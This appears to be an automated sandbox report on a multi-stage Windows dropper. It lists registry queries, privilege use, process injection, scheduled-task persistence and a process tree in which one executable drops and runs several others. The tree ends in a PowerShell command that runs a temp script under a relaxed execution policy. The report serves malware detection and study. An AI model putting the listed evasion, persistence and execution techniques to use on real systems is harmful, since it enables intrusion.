Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	afaefd507f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1cc9b19df2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	54352f7f9d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	85e559204e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6349023c59.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d35ce9d381.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DTQCxXZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7nSTXG6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d74640f13d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	67152b305c.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	54352f7f9d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1e56a29b0d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	26da168d66.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6349023c59.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DTQCxXZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sHN20me.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b91b4b1726.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7nSTXG6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d2YQIJa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	13Z5sqy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jonbDes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5a903ed074.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe

Checks processor information in registry 2 TTPs 20 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7aencsM.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7aencsM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7aencsM.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	1cc9b19df2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7aencsM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	BitLockerToGo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	1cc9b19df2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	BitLockerToGo.exe

Delays execution with timeout.exe 3 IoCs

pid	Process
3264	timeout.exe
1392	timeout.exe
660	timeout.exe

Enumerates system info in registry 2 TTPs 21 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	110	Go-http-client/1.1

Kills process with taskkill 5 IoCs

pid	Process
4892	taskkill.exe
1016	taskkill.exe
5932	taskkill.exe
5660	taskkill.exe
1884	taskkill.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846159492247704"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 3 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3776	schtasks.exe
5636	schtasks.exe
1908	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5468	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
5468	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
4576	skotes.exe
4576	skotes.exe
1612	6349023c59.exe
1612	6349023c59.exe
1612	6349023c59.exe
1612	6349023c59.exe
1556	6349023c59.exe
1556	6349023c59.exe
1556	6349023c59.exe
1556	6349023c59.exe
3740	chrome.exe
3740	chrome.exe
3376	powershell.exe
3376	powershell.exe
3376	powershell.exe
5572	powershell.exe
5572	powershell.exe
5372	ViGgA8C.exe
5372	ViGgA8C.exe
5572	powershell.exe
568	powershell.exe
568	powershell.exe
568	powershell.exe
2556	DTQCxXZ.exe
2556	DTQCxXZ.exe
2556	DTQCxXZ.exe
2556	DTQCxXZ.exe
5372	ViGgA8C.exe
5372	ViGgA8C.exe
5372	ViGgA8C.exe
4104	d2YQIJa.exe
4104	d2YQIJa.exe
4104	d2YQIJa.exe
4104	d2YQIJa.exe
4104	d2YQIJa.exe
4104	d2YQIJa.exe
2104	sHN20me.exe
2104	sHN20me.exe
3912	spoDnGT.exe
3912	spoDnGT.exe
3912	spoDnGT.exe
3912	spoDnGT.exe
3912	spoDnGT.exe
3912	spoDnGT.exe
3992	skotes.exe
3992	skotes.exe
1952	MAl7pjE.exe
1952	MAl7pjE.exe
1952	MAl7pjE.exe
1952	MAl7pjE.exe
1952	MAl7pjE.exe
1952	MAl7pjE.exe
1484	lwtLxxH.exe
1484	lwtLxxH.exe
3804	7aencsM.exe
3804	7aencsM.exe
3804	7aencsM.exe
3804	7aencsM.exe
1484	lwtLxxH.exe
1484	lwtLxxH.exe
1616	chrome.exe
1616	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs

pid	Process
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
2332	chrome.exe
2332	chrome.exe
2332	chrome.exe
2332	chrome.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
5488	chrome.exe
5488	chrome.exe
5488	chrome.exe
5488	chrome.exe
2268	msedge.exe
2268	msedge.exe
6036	msedge.exe
6036	msedge.exe
6036	msedge.exe
6036	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeDebugPrivilege	5572	powershell.exe
Token: SeDebugPrivilege	5372	ViGgA8C.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	1484	lwtLxxH.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	1560	TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeShutdownPrivilege	2332	chrome.exe
Token: SeCreatePagefilePrivilege	2332	chrome.exe
Token: SeShutdownPrivilege	2332	chrome.exe
Token: SeCreatePagefilePrivilege	2332	chrome.exe
Token: SeDebugPrivilege	72	powershell.exe
Token: SeShutdownPrivilege	2332	chrome.exe
Token: SeCreatePagefilePrivilege	2332	chrome.exe
Token: SeDebugPrivilege	5804	powershell.exe
Token: SeShutdownPrivilege	2332	chrome.exe
Token: SeCreatePagefilePrivilege	2332	chrome.exe
Token: SeShutdownPrivilege	2332	chrome.exe
Token: SeCreatePagefilePrivilege	2332	chrome.exe
Token: SeShutdownPrivilege	2332	chrome.exe
Token: SeCreatePagefilePrivilege	2332	chrome.exe
Token: SeShutdownPrivilege	2332	chrome.exe
Token: SeCreatePagefilePrivilege	2332	chrome.exe
Token: SeDebugPrivilege	1076	d35ce9d381.exe
Token: SeShutdownPrivilege	5488	chrome.exe
Token: SeCreatePagefilePrivilege	5488	chrome.exe
Token: SeShutdownPrivilege	5488	chrome.exe
Token: SeCreatePagefilePrivilege	5488	chrome.exe
Token: SeShutdownPrivilege	5488	chrome.exe
Token: SeCreatePagefilePrivilege	5488	chrome.exe
Token: SeShutdownPrivilege	5488	chrome.exe
Token: SeCreatePagefilePrivilege	5488	chrome.exe
Token: SeShutdownPrivilege	5488	chrome.exe
Token: SeCreatePagefilePrivilege	5488	chrome.exe
Token: SeShutdownPrivilege	5488	chrome.exe
Token: SeCreatePagefilePrivilege	5488	chrome.exe
Token: SeShutdownPrivilege	5488	chrome.exe
Token: SeCreatePagefilePrivilege	5488	chrome.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeDebugPrivilege	4892	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	5932	taskkill.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	5660	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5468	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
3172	c9aa4cecce.exe
3172	c9aa4cecce.exe
3172	c9aa4cecce.exe
2332	chrome.exe
2332	chrome.exe
2332	chrome.exe
2332	chrome.exe
2332	chrome.exe
2332	chrome.exe
2332	chrome.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3172	c9aa4cecce.exe
3172	c9aa4cecce.exe
3172	c9aa4cecce.exe
1752	54352f7f9d.exe
1752	54352f7f9d.exe
1752	54352f7f9d.exe
1752	54352f7f9d.exe
1752	54352f7f9d.exe
1752	54352f7f9d.exe
1404	85e559204e.exe
1404	85e559204e.exe
1404	85e559204e.exe
1752	54352f7f9d.exe
1752	54352f7f9d.exe
1752	54352f7f9d.exe
1752	54352f7f9d.exe
1752	54352f7f9d.exe

Suspicious use of SetWindowsHookEx 19 IoCs

pid	Process
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe
912	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5468 wrote to memory of 4576	5468	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	82
PID 5468 wrote to memory of 4576	5468	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	82
PID 5468 wrote to memory of 4576	5468	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	82
PID 4576 wrote to memory of 2832	4576	skotes.exe	83
PID 4576 wrote to memory of 2832	4576	skotes.exe	83
PID 4576 wrote to memory of 2832	4576	skotes.exe	83
PID 2832 wrote to memory of 1556	2832	6349023c59.exe	85
PID 2832 wrote to memory of 1556	2832	6349023c59.exe	85
PID 2832 wrote to memory of 1556	2832	6349023c59.exe	85
PID 2832 wrote to memory of 1556	2832	6349023c59.exe	85
PID 2832 wrote to memory of 1556	2832	6349023c59.exe	85
PID 2832 wrote to memory of 1556	2832	6349023c59.exe	85
PID 2832 wrote to memory of 1556	2832	6349023c59.exe	85
PID 2832 wrote to memory of 1556	2832	6349023c59.exe	85
PID 2832 wrote to memory of 1556	2832	6349023c59.exe	85
PID 2832 wrote to memory of 5736	2832	6349023c59.exe	86
PID 2832 wrote to memory of 5736	2832	6349023c59.exe	86
PID 2832 wrote to memory of 5736	2832	6349023c59.exe	86
PID 2832 wrote to memory of 1612	2832	6349023c59.exe	87
PID 2832 wrote to memory of 1612	2832	6349023c59.exe	87
PID 2832 wrote to memory of 1612	2832	6349023c59.exe	87
PID 2832 wrote to memory of 1612	2832	6349023c59.exe	87
PID 2832 wrote to memory of 1612	2832	6349023c59.exe	87
PID 2832 wrote to memory of 1612	2832	6349023c59.exe	87
PID 2832 wrote to memory of 1612	2832	6349023c59.exe	87
PID 2832 wrote to memory of 1612	2832	6349023c59.exe	87
PID 2832 wrote to memory of 1612	2832	6349023c59.exe	87
PID 4576 wrote to memory of 3940	4576	skotes.exe	92
PID 4576 wrote to memory of 3940	4576	skotes.exe	92
PID 4576 wrote to memory of 3940	4576	skotes.exe	92
PID 3740 wrote to memory of 3628	3740	chrome.exe	96
PID 3740 wrote to memory of 3628	3740	chrome.exe	96
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5524	3740	chrome.exe	97
PID 3740 wrote to memory of 5308	3740	chrome.exe	98
PID 3740 wrote to memory of 5308	3740	chrome.exe	98

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
"C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5468
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4576
- - C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe
    "C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2832
  - - C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe
      "C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1556
  - - C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe
      "C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"
      4⤵
      Executes dropped EXE
      PID:5736
  - - C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe
      "C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1612
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 828
      4⤵
      Program crash
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
    "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3940
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:3332
- - C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
    "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1396
- - C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
    "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:852
  - - C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
      "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2696
  - - C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
      "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 984
      4⤵
      Program crash
      PID:1592
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
    3⤵
